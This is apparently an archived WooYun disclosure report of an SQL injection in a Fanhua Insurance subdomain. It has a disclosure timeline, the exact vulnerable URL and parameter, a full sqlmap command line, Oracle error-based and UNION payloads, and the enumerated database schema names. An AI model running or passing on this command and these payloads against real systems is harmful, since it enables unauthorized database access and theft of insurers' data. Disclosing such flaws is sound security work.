乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-04-18: 细节已通知厂商并且等待厂商处理中 2016-04-20: 厂商已经确认,细节仅向厂商公开 2016-04-30: 细节向核心白帽子及相关领域专家公开 2016-05-10: 细节向普通白帽子公开 2016-05-20: 细节向实习白帽子公开 2016-06-04: 细节向公众公开
泛华保险某分站存在SQL注入漏洞
注入点http://oamob.cninsure.net/common/cvar/CExec.jsp
txtCodeCondition=&txtShowWidth=&txtSQL=&mOperate=&txtCodeName=-2617&startIndex=&txtConditionField=&txtOther=&txtQueryResult=&txtVarData=&txtFrameName=
注入参数txtCodeName
python sqlmap.py -u "http://oamob.cninsure.net/common/cvar/CExec.jsp" --data "txtCodeCondition=&txtShowWidth=&txtSQL=&mOperate=&txtCodeName=-2617&startIndex=&txtConditionField=&txtOther=&txtQueryResult=&txtVarData=&txtFrameName=" -p txtCodeName
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: txtCodeName (POST) Type: error-based Title: Oracle AND error-based - WHERE or HAVING clause (XMLType) Payload: txtCodeCondition=&txtShowWidth=&txtSQL=&mOperate=&txtCodeName=-2617' AND 9277=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(120)||CHR(122)||CHR(98)||CHR(113)||(SELECT (CASE WHEN (9277=9277) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(120)||CHR(120)||CHR(122)||CHR(113)||CHR(62))) FROM DUAL) AND 'TFMj'='TFMj&startIndex=&txtConditionField=&txtOther=&txtQueryResult=&txtVarData=&txtFrameName= Type: UNION query Title: Generic UNION query (NULL) - 7 columns Payload: txtCodeCondition=&txtShowWidth=&txtSQL=&mOperate=&txtCodeName=-2617' UNION ALL SELECT NULL,NULL,CHR(113)||CHR(120)||CHR(122)||CHR(98)||CHR(113)||CHR(101)||CHR(76)||CHR(106)||CHR(108)||CHR(118)||CHR(122)||CHR(121)||CHR(103)||CHR(99)||CHR(99)||CHR(113)||CHR(120)||CHR(120)||CHR(122)||CHR(113),NULL,NULL,NULL,NULL FROM DUAL-- &startIndex=&txtConditionField=&txtOther=&txtQueryResult=&txtVarData=&txtFrameName=---[11:35:18] [INFO] the back-end DBMS is Oracleweb application technology: JSPback-end DBMS: Oracle[11:35:18] [WARNING] schema names are going to be used on Oracle for enumeration as the counterpart to database names on other DBMSes[11:35:18] [INFO] fetching database (schema) names[11:35:18] [WARNING] reflective value(s) found and filtering outavailable databases [16]:[*] CNINSURE[*] CTXSYS[*] DBSNMP[*] DMSYS[*] EXFSYS[*] MDSYS[*] OLAPSYS[*] ORDSYS[*] OUTLN[*] SCOTT[*] SYS[*] SYSMAN[*] SYSTEM[*] TSMSYS[*] WMSYS[*] XDB
过滤
危害等级:中
漏洞Rank:10
确认时间:2016-04-20 15:13
非常感谢!
暂无